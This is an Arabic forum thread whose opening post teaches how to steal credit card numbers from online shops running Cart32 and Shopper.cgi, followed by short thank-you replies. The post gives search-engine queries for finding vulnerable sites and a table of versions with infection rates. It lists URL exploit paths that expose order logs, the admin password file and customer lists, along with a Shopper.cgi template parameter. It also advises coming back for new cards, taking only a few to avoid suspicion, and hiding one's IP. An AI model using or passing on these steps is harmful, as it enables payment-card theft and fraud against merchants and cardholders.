|
Visa وكيفية الحصول عليها + الأنظمة الشرائية
--------------------------------------------------------------------------------
الكثير يرى مننا هذه الرموز ولا يعرف الى ماذا تعني .. Cvv2 = CC with cvv code Cvv = same with cvv2 cc = credit card لدرس اليوم ينقسم الى : اولا : عبر مواقع ذات نظام Cart32 ثانيا : عبر الـ Shopper.cgi عبر مواقع ذات نظام Cart32 : 1.) ايجاد مواقع بأنظمة Cart32 2.) هل هذه المواقع مصابة ؟ 3.) الثغرات . 4.) العودة مرة اخرى في المستقبل . ----------------------------- اولا / ايجاد المواقع الشرائية : ----------------------------- لإيجاد مثل تلك المواقع امر سهل على الجميع .. , كل ما عليك هو الذهاب لأي محرك بحث قوي مثل www.google.com او www.Av.com " المفضل لدي " و من ثم تقوم بالكتابة في مربع البحث عن : Cart32.exe v3 و التي سوف تقوم بإحضار جميع مواقع الـ cart32.exe ذات الإصدار V*.3 و الذي يعد اكثر الإصدارات المصابة .. عشان كذا اولا ما تلاقي اي موقع لـ cart32 على طول لا تسيبه يفوت منك .. ----------------------------- ثانيا : هل الموقع مصاب بثغرة ؟ ----------------------------- و هذا سهل كل ما عليك انك تطالع في هذا الجدول بالأسفل و تشوف الإصدارات و نسبة اصابتها : v2.5 مصاب 80 % v3.0 مصاب 60 % v3.5 مصاب 30 % v4.0 غير مصاب " حتى الآن " ----------------------------- ثالثا / The Exploits ! ----------------------------- هذا هو الجزء المهم .. كيفية استخدام الثغرات و هو اسهل ما يمكن .. فعندما نصل الى احد الـ Cart32 Site مثل : http://www.example.com/cgi-bin/cart32.exe/whateve???r كيف نحصل على الكروت الشرائية الموجودة داخله ؟ سنقوم بإضافة الإكسبلوتات الى نهاية الموقع مثل : http://www.example.com/cgi-bin/cart...ever-ORDERS.txt http://www.example.com/cgi-bin/cart...teve-OUTPUT.txt الحصول على باسورد الأدمن : http://www.example.com/cgi-bin/cart32.ini الحصول على باسورد العملاء : http://www.example.com/cgi-bin/cart...art32clientlist رؤية المجلدات داخل الموقع : http://www.example.com/cgi-bin/cart32.exe/error يوجد الكثير جدا من الثغرات التي يمكن استخدامها " يمكنكم البحث في جوجل" ----------------------------- رابعا / العودة في المستقبل : ----------------------------- عندك الحصول على الكروت الشرائية من المواقع ... و مازالت الشركة و الموقع يستقبل الطلبات .. الحين تكون انت وقعت على كنز هههههههههههههه ليش ؟ لأنك تقدر ترجع بعد كم اسبوع و تاخد الفيز الجديدة مرة ثانية " يا حظك " اول ما تاخد الفيز .. لا تحاول تاخد منها الكثير او تعطيها لأحد حتى لا تشك الشركة فيكم ................................... ............... ................................... ............ الطريقة الثانية و هي عبر اختراق الـ Shopper.cgi و يتكون من : 1.) ايجاد مواقع الـ Shopper.cgi . 2.) تجريب الإكسبلوتات عليها . 3.) العودة مرة أخرى للحصول على المزيد . ---------------- أولا / ايجاد الـ Shopper.CgI Site's : ---------------- مثل المرة اللي فاتت .. تروح لمحرك البحث اللي انت تفضله مثل : www.Av.com و تكتب في صندوق البحث SHOPPER.CGI و تبحث في المواقع حتى تجد مواقع يوجد في اسمه SHOPPER.CGI مثال : www.example.com/xxxx/SHOPPER.CGI/xxxx ---------------- تجريب الإكسبلوتات : ---------------- لو كان عندك احد المواقع التي يوجد بها الـ shopper.cgi .. تروح تضيف بعدها الإكسبلوتات " مثل المرة اللي فاتت " و يوجد الكثير من الإكسبلوتات مثل : &TEMPLATE=ORDER.LOG التي تضاف في نهاية اسم الموقع .. و يمكنك البحث عن المزيد في جوجل ... ---------------- العودة مرة اخرى في المستقبل : ---------------- نفس اللي قلته قبل كذا .. ................................... ............... ........................ لا تنسى اخفائك للأي بي لحمايتك الشخصية اثناء استخدامك للفيزا .. |
مشاركة: Visa وكيفية الحصول عليها + الأنظمة الشرائية
شكرا الك احمد سعد
جزاك الله كل خير |
مشاركة: Visa وكيفية الحصول عليها + الأنظمة الشرائية
مرسى يا محمود
|
| الساعة الآن 10:11 AM. |
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
new notificatio by 9adq_ala7sas